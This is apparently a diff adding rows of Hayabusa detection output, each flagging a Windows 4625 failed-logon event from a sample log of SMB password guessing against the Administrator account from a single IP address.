+2016-09-20 01:51:24.817 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PSXqaP0i1eeKQOmX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:24.874 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gke4vfzIAC3k0yXU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:24.919 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZnjxfeIX4ra6vmBA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:24.963 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ChR30FLLOT3Pvapv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:25.006 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VkepVf00vkpVp9yV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:25.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5i2AxYxwCX6DvP3M  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:25.110 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: j8Fvcw2mQBI61mxH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:25.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: eAazyOpBig2G3Z78  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:25.197 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: o1g3rjPQQAXEK2yz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:25.245 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2BC68zrAEF6L00xS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:25.294 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8xD2aZArxVdrO6fG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:25.392 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HHJN2mJgwQEZhXBG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:25.441 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: untyxmsmYrfRlHcu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:25.486 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: eOc2R5V6p9VBsYI2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:25.547 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: V5Ld2NDMjbY3tiT7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:25.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ykdbglaCU82nRvk5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:25.644 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tDGrsVIC5qVEwC6i  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:25.686 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: UouNQa3EkcsMICiO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:25.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: u0exIftdu0qPLrRC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:25.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: q5mMNIdJj0BItrv6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:25.824 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pb2cVBffdBlwwGQP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:25.852 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: p2FbHoSFFdnM4wH7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:25.917 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RAbCN4xKDDlhmrkU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:25.973 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pxBwuSDdNZlE2F96  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.021 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: M3JkwIQF7yV42rOP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.062 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6QiHHeHeY8yWOiJg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.097 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Rhzpo2bEgpJCB51w  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.145 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AuyPyMMT4wQhLIEz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.194 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: no5bOZf3SEsrETun  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vBTHVleOipnyVFIY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.284 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JNFE2jNifGI7pELk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LgkAKJ57rYqCdbew  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: daKQcllU63lW4ypy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.426 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GBSPSAoEBS7JRYuf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.469 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 94bI5pb8CGjY3QZD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.525 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: w1obedLuMFlHlSvA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.577 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EPn1yJV358YAFALV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.625 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qA7N5DMAJqNYkumM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.663 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2Lk95NYGG5iLBFBw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.709 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: x3DDtXECsK61pIYy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.754 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rt8bfBDTV5wYfBO4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.797 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: uTYMgN5kmFpyj7xN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.845 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RmyF6j61wosCE0sg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.879 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fd61fJBRizl2AIGe  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.924 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bDIFX7lsmGqSGvkA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:27.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: UVmto6S25gU2bkwa  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:27.115 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: B7QMbzSuGuzzMK0v  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:27.174 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VJUynF5bN1Oj0vaP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:27.221 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dg4ZtybY5BnPN0nX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:27.269 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gRmRV9ct3hor8Muk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:27.313 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QRjaP1mj9FgKsGBE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:27.363 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3CCzzatQ195mcxQ8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:27.417 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QJPIrtk5GBAhsUlR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:27.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 720RHwyXQcxvsJBu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:27.606 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GofmHRstuhljMDOL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:27.649 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wQUQ4INktwXwRkaY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:27.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8WHs5hduf7SmUcLK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:27.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gdo1txjJXiRLbUDH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:27.785 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JK8jP3ftKQOyutGe  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:27.832 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DdbEjo88dBJRhrKp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:27.929 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FZCVkXkwhbuSM654  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:27.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Z2mc9WScfBa88rtO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.011 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Lee7qYLkXQoz8rRh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.057 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: f5g1ZKpZuZU1WRoC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.108 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: h4ST7RrHJxAQHHbn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.149 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GtW1hBHF97YqvN4N  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.189 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xVKlPytPofO9LQBm  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.235 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GOkZ9yjvfL51UYXo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.277 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fAxfxSbRqGO7Dej0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.313 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: D7XmvDYk6zFLir09  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.355 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mWcl6CKdSMxd8edZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SxBQlFZvGBqDdobn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
